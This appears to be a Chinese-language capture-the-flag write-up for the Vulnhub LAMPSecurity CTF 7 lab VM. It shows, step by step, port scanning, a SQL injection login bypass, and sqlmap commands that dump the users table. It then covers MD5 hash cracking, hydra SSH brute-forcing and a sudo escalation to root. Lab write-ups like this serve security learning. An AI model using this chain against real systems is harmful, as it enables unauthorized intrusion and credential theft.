【Vulnhub-LAMPSecurity】CTF 7

0x00环境

攻击机IP:192.168.1.28

目标机IP:192.168.1.136

0x01实战

端口扫描

nmap -sV-A -p- 192.168.1.136

【Vulnhub-LAMPSecurity】CTF 7

可以看到开放了很多端口,其中80、8080、901、10000是http服务,那么我们就先去尝试访问这几个端口

http://192.168.1.136/就是正常的Web页面
【Vulnhub-LAMPSecurity】CTF 7

http://192.168.1.136:8080/login.php是一个登录的页面
【Vulnhub-LAMPSecurity】CTF 7

http://192.168.1.136:901/也是需要登录才能查看

【Vulnhub-LAMPSecurity】CTF 7

http://192.168.1.136:10000/也是一个登录页面,尝试了万能密码无法绕过。
【Vulnhub-LAMPSecurity】CTF 7

漏洞发现

经过长时间的查找发现在http://192.168.1.136:8080/login.php处存在SQL注入可以使用万能密码绕过

【Vulnhub-LAMPSecurity】CTF 7

成功登录

【Vulnhub-LAMPSecurity】CTF 7

漏洞利用

使用sqlmap跑一下,使用burp抓包,将数据包保存并命名为sql.txt
暴库

sqlmap -r sql.txt --dbs

【Vulnhub-LAMPSecurity】CTF 7

【Vulnhub-LAMPSecurity】CTF 7

爆表

sqlmap -r sql.txt -D website --tables

【Vulnhub-LAMPSecurity】CTF 7

暴字段

sqlmap -r sql.txt -D website -T users --columns

【Vulnhub-LAMPSecurity】CTF 7

拖库

sqlmap -r sql.txt -D website -T users -C username,password --dump

【Vulnhub-LAMPSecurity】CTF 7

将用户名和密码拖下来分别保存为username.txt和password.txt,使用john破解密码

john --format=Raw-MD5 password.txt

【Vulnhub-LAMPSecurity】CTF 7

太慢了还是使用网站

  • https://www.cmd5.com/
  • https://www.somd5.com/

最终结果

【Vulnhub-LAMPSecurity】CTF 7

将得到的明文密码保存为password2.txt,使用hydra进行爆破

hydra -L username.txt -P password2.txt -t 4 192.168.1.136 ssh

【Vulnhub-LAMPSecurity】CTF 7

在前面的端口扫描中我们看到开放了22-SSH端口,尝试登录,登录成功。
【Vulnhub-LAMPSecurity】CTF 7

提权

查看当前用户可以使用的sudo权限

sudo -l

【Vulnhub-LAMPSecurity】CTF 7

可以看到当前用户可以以root身份运行所有命令

尝试使用sudo su提升权限,成功拿到root权限

sudo su

【Vulnhub-LAMPSecurity】CTF 7

上一篇:JAVA基础知识之JVM-——URLClassLoader


下一篇:JAVA课程课后作业03之动手动脑